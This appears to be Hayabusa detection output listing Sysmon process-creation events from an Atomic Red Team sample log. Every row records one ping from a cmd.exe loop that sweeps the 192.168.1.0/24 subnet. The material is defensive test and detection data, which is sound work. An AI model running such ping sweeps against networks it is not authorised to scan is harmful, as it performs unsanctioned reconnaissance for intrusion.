2019-07-19 23:52:21.488 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.94 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:22.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.95 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:22.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.96 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:23.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.97 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:23.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.98 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:24.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.99 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:24.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.100 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:25.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.101 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:25.529 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.102 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:26.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.103 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:26.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.104 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:27.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.105 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:27.493 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.106 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:28.017 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.107 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:28.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.108 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:29.110 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.109 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:29.561 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.110 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:30.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.111 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:30.526 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.112 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:31.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.113 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:31.476 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.114 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:32.005 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.115 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:32.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.116 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:33.004 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.117 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:33.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.118 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:33.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.119 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:34.490 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.120 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:35.031 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.121 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:35.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.122 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:35.999 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.123 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:36.510 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.124 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:36.905 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.125 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:37.449 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.126 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:37.947 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.127 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:38.514 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.128 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:38.992 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.129 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:39.508 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.130 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:40.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.131 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:40.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.132 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:40.960 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.133 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:41.512 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.134 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:41.967 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.135 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:42.436 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.136 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:42.881 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.137 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:43.478 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.138 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:43.951 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.139 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:44.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.140 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:44.926 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.141 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:45.532 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.142 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:45.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.143 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:46.405 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.144 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:46.879 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.145 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:47.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.146 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:47.993 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.147 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:48.567 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.148 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
